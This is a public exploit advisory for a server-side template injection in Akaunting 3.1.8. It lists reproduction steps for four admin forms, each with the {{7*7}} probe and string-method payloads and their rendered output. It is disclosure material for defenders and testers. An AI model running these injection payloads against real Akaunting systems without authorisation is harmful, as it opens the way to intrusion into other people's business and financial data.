# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)# Exploit Author: tmrswrr# Date: 30/05/2024# Vendor: https://akaunting.com/forum# Software Link: https://akaunting.com/apps/crm# Vulnerable Version(s): 3.1.8# Tested : https://www.softaculous.com/apps/erp/Akaunting1) Login with admin cred and go to : Items > New Item
https://127.0.0.1/Akaunting/1/common/items
2) Write SSTI payload :{{7*7}}Name field , write Sale and Purchase Price random numbers
3) Save it
4) You will be see result :49====================================================================================1) Login with admin cred and go to :Settings > Taxes > New Tax
https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
2) Write SSTI payload :{{7*7}}Name field , write Sale and Purchase Price random numbers
3) Save it
4) You will be see result :49>{{'a'.toUpperCase()}}> A
>{{'a'.concat('b')}}> ab
====================================================================================1) Login with admin cred and go to : Banking > Transactions > New Income
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
2) Write SSTI payload :{{7*7}}Description field
3) Save it
4) You will be see result :49>{{'a'.toUpperCase()}}> A
>{{'a'.concat('b')}}> ab
=======================================================================================1) Login with admin cred
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
2) Write SSTI payload :{{7*7}}Name field
3) Save it
4) You will be see result :49>{{'a'.toUpperCase()}}> A
>{{'a'.concat('b')}}> ab
